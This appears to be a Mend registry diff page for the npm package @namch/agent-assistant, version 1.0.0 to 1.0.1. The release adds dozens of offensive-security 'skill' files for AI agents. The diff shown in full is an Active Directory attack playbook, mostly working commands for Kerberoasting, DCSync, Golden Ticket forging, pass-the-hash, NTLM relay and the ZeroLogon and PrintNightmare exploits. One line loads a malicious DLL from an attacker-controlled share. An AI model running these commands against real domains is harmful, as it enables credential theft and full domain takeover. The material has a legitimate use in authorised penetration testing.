npm - @namch/agent-assistant - Versions diffs - 1.0.0 → 1.0.1 - Mend

@namch/agent-assistant 1.0.0 → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (168) hide show

package/README.md +83 -539
package/agents/backend-engineer.md +0 -8
package/agents/brainstormer.md +0 -6
package/agents/business-analyst.md +0 -5
package/agents/database-architect.md +0 -6
package/agents/debugger.md +0 -6
package/agents/designer.md +0 -5
package/agents/devops-engineer.md +0 -7
package/agents/docs-manager.md +0 -6
package/agents/frontend-engineer.md +0 -7
package/agents/game-engineer.md +0 -7
package/agents/mobile-engineer.md +0 -7
package/agents/performance-engineer.md +0 -7
package/agents/planner.md +0 -6
package/agents/project-manager.md +0 -6
package/agents/researcher.md +0 -5
package/agents/reviewer.md +0 -6
package/agents/scouter.md +0 -6
package/agents/security-engineer.md +0 -7
package/agents/tech-lead.md +0 -7
package/agents/tester.md +0 -5
package/cli/README.md +19 -10
package/documents/business/business-features.md +1 -1
package/documents/business/business-prd.md +4 -4
package/documents/knowledge-architecture.md +1 -1
package/documents/knowledge-domain.md +1 -1
package/documents/knowledge-overview.md +14 -29
package/documents/knowledge-source-base.md +14 -14
package/package.json +1 -1
package/rules/QUICK-REFERENCE.md +4 -1
package/rules/SKILL-DISCOVERY.md +37 -14
package/skills/active-directory-attacks/SKILL.md +383 -0
package/skills/active-directory-attacks/references/advanced-attacks.md +382 -0
package/skills/agent-evaluation/SKILL.md +64 -0
package/skills/agent-memory-mcp/SKILL.md +82 -0
package/skills/agent-memory-systems/SKILL.md +67 -0
package/skills/agent-tool-builder/SKILL.md +53 -0
package/skills/ai-agents-architect/SKILL.md +90 -0
package/skills/ai-product/SKILL.md +54 -0
package/skills/ai-wrapper-product/SKILL.md +273 -0
package/skills/api-documentation-generator/SKILL.md +484 -0
package/skills/api-fuzzing-bug-bounty/SKILL.md +433 -0
package/skills/api-security-best-practices/SKILL.md +907 -0
package/skills/autonomous-agent-patterns/SKILL.md +761 -0
package/skills/autonomous-agents/SKILL.md +68 -0
package/skills/aws-penetration-testing/SKILL.md +405 -0
package/skills/aws-penetration-testing/references/advanced-aws-pentesting.md +469 -0
package/skills/azure-functions/SKILL.md +42 -0
package/skills/backend-dev-guidelines/SKILL.md +342 -0
package/skills/backend-dev-guidelines/resources/architecture-overview.md +451 -0
package/skills/backend-dev-guidelines/resources/async-and-errors.md +307 -0
package/skills/backend-dev-guidelines/resources/complete-examples.md +638 -0
package/skills/backend-dev-guidelines/resources/configuration.md +275 -0
package/skills/backend-dev-guidelines/resources/database-patterns.md +224 -0
package/skills/backend-dev-guidelines/resources/middleware-guide.md +213 -0
package/skills/backend-dev-guidelines/resources/routing-and-controllers.md +756 -0
package/skills/backend-dev-guidelines/resources/sentry-and-monitoring.md +336 -0
package/skills/backend-dev-guidelines/resources/services-and-repositories.md +789 -0
package/skills/backend-dev-guidelines/resources/testing-guide.md +235 -0
package/skills/backend-dev-guidelines/resources/validation-patterns.md +754 -0
package/skills/broken-authentication/SKILL.md +476 -0
package/skills/bullmq-specialist/SKILL.md +57 -0
package/skills/bun-development/SKILL.md +691 -0
package/skills/burp-suite-testing/SKILL.md +380 -0
package/skills/cloud-penetration-testing/SKILL.md +501 -0
package/skills/cloud-penetration-testing/references/advanced-cloud-scripts.md +318 -0
package/skills/computer-use-agents/SKILL.md +315 -0
package/skills/content-creator/SKILL.md +248 -0
package/skills/content-creator/assets/content_calendar_template.md +99 -0
package/skills/content-creator/references/brand_guidelines.md +199 -0
package/skills/content-creator/references/content_frameworks.md +534 -0
package/skills/content-creator/references/social_media_optimization.md +317 -0
package/skills/content-creator/scripts/brand_voice_analyzer.py +185 -0
package/skills/content-creator/scripts/seo_optimizer.py +419 -0
package/skills/context-window-management/SKILL.md +53 -0
package/skills/conversation-memory/SKILL.md +61 -0
package/skills/copy-editing/SKILL.md +439 -0
package/skills/copywriting/SKILL.md +225 -0
package/skills/crewai/SKILL.md +243 -0
package/skills/discord-bot-architect/SKILL.md +277 -0
package/skills/dispatching-parallel-agents/SKILL.md +180 -0
package/skills/email-sequence/SKILL.md +925 -0
package/skills/email-systems/SKILL.md +54 -0
package/skills/ethical-hacking-methodology/SKILL.md +466 -0
package/skills/executing-plans/SKILL.md +76 -0
package/skills/file-path-traversal/SKILL.md +486 -0
package/skills/finishing-a-development-branch/SKILL.md +200 -0
package/skills/frontend-dev-guidelines/SKILL.md +359 -0
package/skills/frontend-dev-guidelines/resources/common-patterns.md +331 -0
package/skills/frontend-dev-guidelines/resources/complete-examples.md +872 -0
package/skills/frontend-dev-guidelines/resources/component-patterns.md +502 -0
package/skills/frontend-dev-guidelines/resources/data-fetching.md +767 -0
package/skills/frontend-dev-guidelines/resources/file-organization.md +502 -0
package/skills/frontend-dev-guidelines/resources/loading-and-error-states.md +501 -0
package/skills/frontend-dev-guidelines/resources/performance.md +406 -0
package/skills/frontend-dev-guidelines/resources/routing-guide.md +364 -0
package/skills/frontend-dev-guidelines/resources/styling-guide.md +428 -0
package/skills/frontend-dev-guidelines/resources/typescript-standards.md +418 -0
package/skills/gcp-cloud-run/SKILL.md +288 -0
package/skills/git-pushing/SKILL.md +33 -0
package/skills/git-pushing/scripts/smart_commit.sh +19 -0
package/skills/github-workflow-automation/SKILL.md +846 -0
package/skills/html-injection-testing/SKILL.md +498 -0
package/skills/idor-testing/SKILL.md +442 -0
package/skills/inngest/SKILL.md +55 -0
package/skills/javascript-mastery/SKILL.md +645 -0
package/skills/kaizen/SKILL.md +730 -0
package/skills/langfuse/SKILL.md +238 -0
package/skills/langgraph/SKILL.md +287 -0
package/skills/linux-privilege-escalation/SKILL.md +504 -0
package/skills/llm-app-patterns/SKILL.md +760 -0
package/skills/metasploit-framework/SKILL.md +478 -0
package/skills/multi-agent-brainstorming/SKILL.md +256 -0
package/skills/neon-postgres/SKILL.md +56 -0
package/skills/nextjs-supabase-auth/SKILL.md +56 -0
package/skills/nosql-expert/SKILL.md +111 -0
package/skills/pentest-checklist/SKILL.md +334 -0
package/skills/pentest-commands/SKILL.md +438 -0
package/skills/plaid-fintech/SKILL.md +50 -0
package/skills/planning-with-files/SKILL.md +211 -0
package/skills/planning-with-files/examples.md +202 -0
package/skills/planning-with-files/reference.md +218 -0
package/skills/planning-with-files/scripts/check-complete.sh +44 -0
package/skills/planning-with-files/scripts/init-session.sh +120 -0
package/skills/planning-with-files/templates/findings.md +95 -0
package/skills/planning-with-files/templates/progress.md +114 -0
package/skills/planning-with-files/templates/task_plan.md +132 -0
package/skills/privilege-escalation-methods/SKILL.md +333 -0
package/skills/production-code-audit/SKILL.md +540 -0
package/skills/prompt-caching/SKILL.md +61 -0
package/skills/prompt-engineering/SKILL.md +171 -0
package/skills/prompt-library/SKILL.md +322 -0
package/skills/rag-engineer/SKILL.md +90 -0
package/skills/rag-implementation/SKILL.md +63 -0
package/skills/react-ui-patterns/SKILL.md +289 -0
package/skills/red-team-tools/SKILL.md +310 -0
package/skills/scanning-tools/SKILL.md +589 -0
package/skills/shodan-reconnaissance/SKILL.md +503 -0
package/skills/slack-bot-builder/SKILL.md +264 -0
package/skills/smtp-penetration-testing/SKILL.md +500 -0
package/skills/social-content/SKILL.md +807 -0
package/skills/software-architecture/SKILL.md +75 -0
package/skills/sql-injection-testing/SKILL.md +448 -0
package/skills/sqlmap-database-pentesting/SKILL.md +400 -0
package/skills/ssh-penetration-testing/SKILL.md +488 -0
package/skills/stripe-integration/SKILL.md +69 -0
package/skills/subagent-driven-development/SKILL.md +240 -0
package/skills/subagent-driven-development/code-quality-reviewer-prompt.md +20 -0
package/skills/subagent-driven-development/implementer-prompt.md +78 -0
package/skills/subagent-driven-development/spec-reviewer-prompt.md +61 -0
package/skills/tavily-web/SKILL.md +36 -0
package/skills/telegram-bot-builder/SKILL.md +254 -0
package/skills/test-driven-development/SKILL.md +371 -0
package/skills/test-driven-development/testing-anti-patterns.md +299 -0
package/skills/test-fixing/SKILL.md +119 -0
package/skills/top-web-vulnerabilities/SKILL.md +543 -0
package/skills/trigger-dev/SKILL.md +67 -0
package/skills/twilio-communications/SKILL.md +295 -0
package/skills/upstash-qstash/SKILL.md +68 -0
package/skills/verification-before-completion/SKILL.md +139 -0
package/skills/voice-agents/SKILL.md +68 -0
package/skills/voice-ai-development/SKILL.md +302 -0
package/skills/windows-privilege-escalation/SKILL.md +496 -0
package/skills/wireshark-analysis/SKILL.md +497 -0
package/skills/wordpress-penetration-testing/SKILL.md +485 -0
package/skills/workflow-automation/SKILL.md +68 -0
package/skills/xss-html-injection/SKILL.md +499 -0
package/skills/zapier-make-patterns/SKILL.md +67 -0

package/rules/SKILL-DISCOVERY.md CHANGED Viewed

@@ -2,7 +2,7 @@
 > **Purpose**: Runtime resolution of skills for agents using the Matrix Metadata system.
 > **Source**: `~/.{TOOL}/skills/agent-assistant/matrix-skills/` (distributed by domain)
-> **Total Skills**: 218 skills across 19 domains
+> **Total Skills**: 310 skills across 19 domains
 ---
@@ -15,24 +15,24 @@ The Skill Discovery Protocol replaces hardcoded skill lists in agent files with
 ```
 matrix-skills/
 ├── _index.yaml          # Registry, agent profiles, resolution rules
-├── backend.yaml         # 20 skills
-├── frontend.yaml        # 18 skills
+├── backend.yaml         # 32 skills
+├── frontend.yaml        # 22 skills
 ├── architecture.yaml    # 9 skills
-├── quality.yaml         # 17 skills
-├── security.yaml        # 6 skills
+├── quality.yaml         # 21 skills
+├── security.yaml        # 35 skills
 ├── design.yaml          # 10 skills
-├── planning.yaml        # 9 skills
-├── devops.yaml          # 15 skills
+├── planning.yaml        # 12 skills
+├── devops.yaml          # 22 skills
 ├── data.yaml            # 7 skills
 ├── performance.yaml     # 1 skill
 ├── research.yaml        # 11 skills
 ├── mobile.yaml          # 8 skills
 ├── gaming.yaml          # 3 skills
 ├── management.yaml      # 4 skills
-├── ai-ml.yaml           # 13 skills
+├── ai-ml.yaml           # 40 skills
 ├── cloud.yaml           # 11 skills
 ├── languages.yaml       # 17 skills
-├── tools.yaml           # 31 skills
+├── tools.yaml           # 41 skills
 └── mcp.yaml             # 8 skills
 ```
@@ -128,18 +128,24 @@ profile: "backend:execution"
 | Step | Source File | Skills Found |
 |------|-------------|--------------|
-| 1 | backend.yaml | api-patterns, backend-development, microservices-architect |
+| 1 | backend.yaml | api-patterns, backend-development, microservices-architect, backend-dev-guidelines, software-architecture, bun-development, inngest, trigger-dev, stripe-integration |
 | 2 | architecture.yaml | architecture, clean-code |
-| 3 | data.yaml | database-design, sql-pro, prisma-expert |
-| 4 | languages.yaml | typescript-expert, python-patterns |
+| 3 | data.yaml | database-design, sql-pro, prisma-expert, nosql-expert, neon-postgres |
+| 4 | languages.yaml | typescript-expert, python-patterns, javascript-mastery |
+| 5 | ai-ml.yaml | ai-agents-architect, autonomous-agents, llm-app-patterns, rag-engineer, prompt-engineering, crewai, langgraph |
 **Output (sorted by priority):**
 ```
 architecture (10)
+ai-agents-architect (9)
 api-patterns (9)
 database-design (9)
 clean-code (9)
 backend-development (8)
+backend-dev-guidelines (8)
+software-architecture (8)
+llm-app-patterns (8)
+rag-engineer (8)
 typescript-expert (8)
 microservices-architect (8)
 ...
@@ -216,6 +222,21 @@ This enables cross-domain skill sharing without explicit agent declarations.
 ---
+## Agent Files: Profile + Domains Only
+Agent files **do not** list key skills or domain-file tables. Each agent's Skills section contains only:
+```markdown
+## ⚡ Skills
+> **MATRIX DISCOVERY**: Skills auto-injected from domain files in `~/.{TOOL}/skills/agent-assistant/matrix-skills/`
+> Profile: `{domain}:{category}` | Domains: `{inherit_from from _index.yaml}`
+```
+AI tools resolve skills by reading `~/.{TOOL}/skills/agent-assistant/matrix-skills/_index.yaml` → `agent_profiles.{agent}.inherit_from`, then loading the listed domain files and injecting skills via `relevance_mapping`. **When adding new skills, update only the skill folder and the corresponding matrix-skills domain file; no agent file changes are required.**
+---
 ## Adding New Skills
 ### Workflow
@@ -240,7 +261,9 @@ This enables cross-domain skill sharing without explicit agent declarations.
 3. **Update domain skill_count in _index.yaml** (optional but recommended)
-4. **Verify resolution:**
+4. **Do not edit agent files** — skills are resolved from matrix-skills by Profile and Domains only.
+5. **Verify resolution:**
    - Skill appears in target agent's resolved set
    - Priority ordering is correct
    - No conflicts with existing skills
@@ -322,7 +345,7 @@ The orchestrator never needs to know individual skills—it only needs the agent
 - Resolution: O(D × S) where D=inherited domains, S=skills per domain
 - Typical resolution: < 1ms
-- Total Matrix size: ~218 skills = ~15KB across all YAML files
+- Total Matrix size: ~310 skills = ~25KB across all YAML files
 ---

package/skills/active-directory-attacks/SKILL.md ADDED Viewed

@@ -0,0 +1,383 @@
+---
+name: Active Directory Attacks
+description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
+metadata:
+  author: zebbern
+  version: "1.1"
+---
+# Active Directory Attacks
+## Purpose
+Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
+## Inputs/Prerequisites
+- Kali Linux or Windows attack platform
+- Domain user credentials (for most attacks)
+- Network access to Domain Controller
+- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
+## Outputs/Deliverables
+- Domain enumeration data
+- Extracted credentials and hashes
+- Kerberos tickets for impersonation
+- Domain Administrator access
+- Persistent access mechanisms
+---
+## Essential Tools
+| Tool | Purpose |
+|------|---------|
+| BloodHound | AD attack path visualization |
+| Impacket | Python AD attack tools |
+| Mimikatz | Credential extraction |
+| Rubeus | Kerberos attacks |
+| CrackMapExec | Network exploitation |
+| PowerView | AD enumeration |
+| Responder | LLMNR/NBT-NS poisoning |
+---
+## Core Workflow
+### Step 1: Kerberos Clock Sync
+Kerberos requires clock synchronization (±5 minutes):
+```bash
+# Detect clock skew
+nmap -sT 10.10.10.10 -p445 --script smb2-time
+# Fix clock on Linux
+sudo date -s "14 APR 2024 18:25:16"
+# Fix clock on Windows
+net time /domain /set
+# Fake clock without changing system time
+faketime -f '+8h' <command>
+```
+### Step 2: AD Reconnaissance with BloodHound
+```bash
+# Start BloodHound
+neo4j console
+bloodhound --no-sandbox
+# Collect data with SharpHound
+.\SharpHound.exe -c All
+.\SharpHound.exe -c All --ldapusername user --ldappassword pass
+# Python collector (from Linux)
+bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
+```
+### Step 3: PowerView Enumeration
+```powershell
+# Get domain info
+Get-NetDomain
+Get-DomainSID
+Get-NetDomainController
+# Enumerate users
+Get-NetUser
+Get-NetUser -SamAccountName targetuser
+Get-UserProperty -Properties pwdlastset
+# Enumerate groups
+Get-NetGroupMember -GroupName "Domain Admins"
+Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
+# Find local admin access
+Find-LocalAdminAccess -Verbose
+# User hunting
+Invoke-UserHunter
+Invoke-UserHunter -Stealth
+```
+---
+## Credential Attacks
+### Password Spraying
+```bash
+# Using kerbrute
+./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
+# Using CrackMapExec
+crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
+```
+### Kerberoasting
+Extract service account TGS tickets and crack offline:
+```bash
+# Impacket
+GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
+# Rubeus
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+# CrackMapExec
+crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
+# Crack with hashcat
+hashcat -m 13100 hashes.txt rockyou.txt
+```
+### AS-REP Roasting
+Target accounts with "Do not require Kerberos preauthentication":
+```bash
+# Impacket
+GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
+# Rubeus
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
+# Crack with hashcat
+hashcat -m 18200 hashes.txt rockyou.txt
+```
+### DCSync Attack
+Extract credentials directly from DC (requires Replicating Directory Changes rights):
+```bash
+# Impacket
+secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
+# Mimikatz
+lsadump::dcsync /domain:domain.local /user:krbtgt
+lsadump::dcsync /domain:domain.local /user:Administrator
+```
+---
+## Kerberos Ticket Attacks
+### Pass-the-Ticket (Golden Ticket)
+Forge TGT with krbtgt hash for any user:
+```powershell
+# Get krbtgt hash via DCSync first
+# Mimikatz - Create Golden Ticket
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
+# Impacket
+ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+export KRB5CCNAME=Administrator.ccache
+psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
+```
+### Silver Ticket
+Forge TGS for specific service:
+```powershell
+# Mimikatz
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
+```
+### Pass-the-Hash
+```bash
+# Impacket
+psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+# CrackMapExec
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
+```
+### OverPass-the-Hash
+Convert NTLM hash to Kerberos ticket:
+```bash
+# Impacket
+getTGT.py domain.local/user -hashes :NTHASH
+export KRB5CCNAME=user.ccache
+# Rubeus
+.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
+```
+---
+## NTLM Relay Attacks
+### Responder + ntlmrelayx
+```bash
+# Start Responder (disable SMB/HTTP for relay)
+responder -I eth0 -wrf
+# Start relay
+ntlmrelayx.py -tf targets.txt -smb2support
+# LDAP relay for delegation attack
+ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
+```
+### SMB Signing Check
+```bash
+crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
+```
+---
+## Certificate Services Attacks (AD CS)
+### ESC1 - Misconfigured Templates
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
+# Exploit ESC1
+certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
+# Authenticate with certificate
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
+```
+### ESC8 - Web Enrollment Relay
+```bash
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+```
+---
+## Critical CVEs
+### ZeroLogon (CVE-2020-1472)
+```bash
+# Check vulnerability
+crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
+# Exploit
+python3 cve-2020-1472-exploit.py DC01 10.10.10.10
+# Extract hashes
+secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
+# Restore password (important!)
+python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
+```
+### PrintNightmare (CVE-2021-1675)
+```bash
+# Check for vulnerability
+rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
+# Exploit (requires hosting malicious DLL)
+python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
+```
+### samAccountName Spoofing (CVE-2021-42278/42287)
+```bash
+# Automated exploitation
+python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
+```
+---
+## Quick Reference
+| Attack | Tool | Command |
+|--------|------|---------|
+| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
+| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
+| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
+| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
+| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
+| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
+---
+## Constraints
+**Must:**
+- Synchronize time with DC before Kerberos attacks
+- Have valid domain credentials for most attacks
+- Document all compromised accounts
+**Must Not:**
+- Lock out accounts with excessive password spraying
+- Modify production AD objects without approval
+- Leave Golden Tickets without documentation
+**Should:**
+- Run BloodHound for attack path discovery
+- Check for SMB signing before relay attacks
+- Verify patch levels for CVE exploitation
+---
+## Examples
+### Example 1: Domain Compromise via Kerberoasting
+```bash
+# 1. Find service accounts with SPNs
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
+# 2. Request TGS tickets
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
+# 3. Crack tickets
+hashcat -m 13100 tgs.txt rockyou.txt
+# 4. Use cracked service account
+psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
+```
+### Example 2: NTLM Relay to LDAP
+```bash
+# 1. Start relay targeting LDAP
+ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
+# 2. Trigger authentication (e.g., via PrinterBug)
+python3 printerbug.py domain.local/user:pass@target 10.10.10.12
+# 3. Use created machine account for RBCD attack
+```
+---
+## Troubleshooting
+| Issue | Solution |
+|-------|----------|
+| Clock skew too great | Sync time with DC or use faketime |
+| Kerberoasting returns empty | No service accounts with SPNs |
+| DCSync access denied | Need Replicating Directory Changes rights |
+| NTLM relay fails | Check SMB signing, try LDAP target |
+| BloodHound empty | Verify collector ran with correct creds |
+---
+## Additional Resources
+For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).